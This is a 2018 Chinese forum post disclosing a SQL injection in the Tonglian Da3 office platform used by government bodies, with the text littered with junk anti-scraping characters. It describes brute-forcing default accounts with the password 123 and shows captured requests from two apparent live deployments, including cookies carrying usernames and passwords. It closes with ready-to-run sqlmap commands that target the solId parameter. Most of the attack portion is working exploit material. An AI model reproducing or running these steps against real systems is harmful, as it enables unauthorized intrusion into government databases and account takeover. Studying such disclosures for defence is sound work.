找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1548|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:15:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

5 L8 D- Q$ _0 M! e0 D2 o
6 E2 S9 Y' q! i% p$ H3 {3 y a

f5 ~+ m1 ?; b7 m7 E- C7 c

- k; ?, ?( K/ C. R$ |6 p 平台简介:+ R" i# Z) C8 C! r. C, |

) t5 E; r4 d) Q0 g6 G

* X T4 F3 p3 W z% S   ; M/ v* N2 K; H/ @

7 `* E4 [8 M. f5 N% D7 i* `% ~

/ H2 _: v& i! W) U9 M J 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
- G3 w( l6 `- V+ R同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
$ W$ @9 ?& ?: [4 v h- U同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!6 |5 X. `8 i9 o7 x

7 O8 ~; R' F+ Z" i

8 z0 u* F5 m, W: h& a$ i9 m8 ~# }+ T: y   : f/ ^1 B; a/ v( S3 ]1 _; h8 ]

8 F3 X+ ~) a6 X8 p0 B9 R

3 X/ a; C! s$ Y% u- w/ _8 O 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址: ; V* `9 q* I4 ^

. D5 c& _' {8 |! @+ y$ r

q5 _2 u+ z |4 Y9 f! n   4 K- m% j- x0 M4 v

. S1 [0 R# V' X5 q; `8 c" H* J

- {( i7 e7 G7 ~* R2 Q$ `. D http://1.1.1.1:7197/cap-aco/#(案例2-)1 C. H- ^* d* {) G& w; Z

9 s+ B4 R Q8 E* y, W/ j% X

2 C q5 ?1 I' s5 F$ D6 Y http://www.XXOO.com (案例1-官网网站): h( e/ O! y* }9 r1 T

+ w3 U6 W6 x7 }3 G; i: V6 O

7 Y7 A0 W/ b5 K' O* T* t7 x4 n   ! q [" g& w* @) e2 H& ^

+ }: _& i# @; A0 i5 G4 V5 n

( i, n7 g$ K! Y7 ?5 u 漏洞详情: 0 W& H( q0 Z4 p4 K" W0 p3 G

$ p& n0 P; J2 s( J8 u% Z; }) u

0 o, k& |7 b6 d: A3 ?- Z  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试 3 t N q% A$ O& j

0 f& M/ n2 H- k' j5 _- g0 i

7 w; m6 j! X, s3 s, S, P0 [      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:( k% Q* A/ T; f/ c* S3 [1 U. w+ p

* b5 }/ F" f8 A' A

, }& K1 h. r0 t! B! v8 V, G  : m' a6 t* W, b7 Z! A! L J

. }$ a1 _( [# p- N3 M

3 @5 K6 a0 @7 L   / @% m4 G5 B T( y& {+ Z

- F/ h7 u o2 {5 M9 g. M& b9 U2 ]% L

! U9 n: Q, Q+ ` status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下: * i6 x; b t& a: [- I( f. I

% p2 I l- ~+ J6 f- S4 Q

9 ^$ P! _; ?2 R6 A9 ~! K 1、案例1-官方网站+ a$ j1 Y0 N [; ]. s

1 P- k, T2 F1 x* `) R, u

$ R Y9 g: m$ ^" V7 L- w) U GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1 ) {7 G0 O* ^1 r! ^

7 Q8 q+ r- o: a3 q( J/ G# J

2 z3 |1 O5 {; c/ t0 h% S5 H Host: www.XXOO.com 4 p* M# \, U) P4 a o; @

. v1 H2 D0 ?' \) z

' g, W1 u$ A! k9 H7 b6 @6 y Proxy-Connection: Keep-Alive ( n" `+ \) [+ J. r( l7 l

+ {! b( H% w @& @: p

9 y% ]6 w c2 ~) ~7 V: K Accept: application/json, text/javascript, */*; q=0.01. ?4 H8 y* z' ?3 b$ _* f/ U

, N' H3 F* N2 w5 X( C' a+ e; j

& o8 J: z T: `0 g Accept-Language: zh-CN " T/ U! E2 }2 G0 M2 T: ~2 g; y

- A" @( Y4 M2 v( j. W

+ D, n ?; x6 }7 x' w# N2 ] Content-Type: application/json - ]7 E9 f C5 ~, E

1 {' p1 D( A3 S

A+ j* S9 e9 x& i$ r. K) |, E User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko * Q% a0 E0 |2 t+ P; y, c) F

4 q4 s' s$ l5 Y7 X* ^: w

4 J, r% @+ j. B6 P1 F X-Requested-With: XMLHttpRequest! k( r: j7 `1 U M

: R4 e% t+ M3 ^7 v2 ^" |

/ V5 ], u- J2 n Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002 / D* U0 e# A( d& U4 n0 _+ a2 E

. {% s; n; ^- ], Z6 m2 j

% \3 [$ z$ S t7 Y+ p: H Accept-Encoding: gzip, deflate, sdch+ y3 `: I+ S4 O3 j. E ?

. V0 i7 m! O& _, H, T% g

V- }( O R2 T" K7 N) \# | Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e + c7 S! b3 |6 y( [7 @* d

6 n! z" W/ r; P6 ?7 a

, ~8 m* A. o/ D4 h' Y1 I 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:% T% K6 o* a, y- V! L

% X# a! j0 K- y2 z4 n% `1 P

z! b1 _9 a" w! E6 [3 }6 o0 L2 `  8 ]7 X3 J4 G5 ]) i; G' g/ P. o# Y/ p0 Y$ p

2 N" ^$ x5 t$ G: h0 o9 y

; M! a$ P5 ?8 y( @9 S7 Y  # M' a5 X6 Q% m

& O \- }& ~: G6 t+ n% k! f

; n6 \$ M% z7 W   ! j& \8 Q! Z$ t; f

5 {9 T; V0 F% |

, ?$ o. g( x' ]- a9 z' J+ T) H  8 l" f; a3 l" h* N$ w1 w4 X

! |1 O4 m5 s$ p3 A( c

4 a6 k; P8 F* Y# {. f1 H   + H/ U0 _! U1 ] k" R/ Q: o

& T% m8 u; a8 s& E1 f

2 M1 v9 U4 L, u+ `1 F8 w0 q. d 2、案例2-某天河云平台0 R0 K4 R' j/ D4 ?/ r2 Q

- p. V3 {2 `' z# K6 ~- @; }

" a6 s5 a, ~2 c3 F# n GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1, r: u; M3 }+ D( c* O

) o# p7 { |+ y! G! P# C- ?6 j

& `$ b8 j H! [/ e* o) J; L Host: 1.1.1.:7197 0 b; Z% r) b/ Z

3 b7 p: _. L3 @( u, I! d

7 J9 j4 Q: E$ z" d0 e5 R Accept: application/json, text/javascript, */*; q=0.01 9 t+ S9 o4 k, Z7 r

- m7 G2 r" ]0 x4 J! z0 `

- _, i, {! m: k4 u7 Z. j# n. e X-Requested-With: XMLHttpRequest( P6 U5 n; u f" U) W# S t5 X

' }; x5 {' p! @* o1 o$ g+ E- M

3 |4 H' J, C0 j User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.03 f3 t( G2 Y! R# V! d

4 h; E- c$ j% A( M6 o, D p

- c2 V' k9 Q4 x* A6 w; m# j Content-Type: application/json $ K) ?4 o+ F Z# J7 ?9 L+ m/ L

$ x+ @6 D3 N! n* Y! ]( M

9 l) N) @" o; T# X. p9 u7 t! J7 f Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008 1 T. G& E; j: b$ W3 c0 U

: Q" C7 x' e7 E

# {5 ?8 ^! p& X) A5 T8 I7 p: M' P Accept-Language: zh-CN,zh;q=0.8 & F3 z. P0 X4 @9 r

0 S( M$ {& G A9 ]0 ]! Z8 ~

# B% ]/ J) j- N; M8 Q, o+ P, y Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=14 ^& e5 w2 w. V

! p$ Q9 G, M8 [2 e( [) `0 G

" }6 j% M/ Z Z5 o0 a Connection: close9 b ^/ D' h: ~0 s" ?

6 g8 n. e' S& o! u

! W0 m( _2 a- w# a/ H1 d8 ], G 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:8 b4 t L% Q1 F3 C6 ~0 Z

/ R* P" V1 m h: X* Z

( u( P9 E: |) I$ g   : `# \+ |" P" W3 ^ d+ x2 S

6 y$ N" C# u3 _( g( Z% A) C; d

4 i5 B, l( T% h: G/ X
0 k6 a* V8 G$ T6 \

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表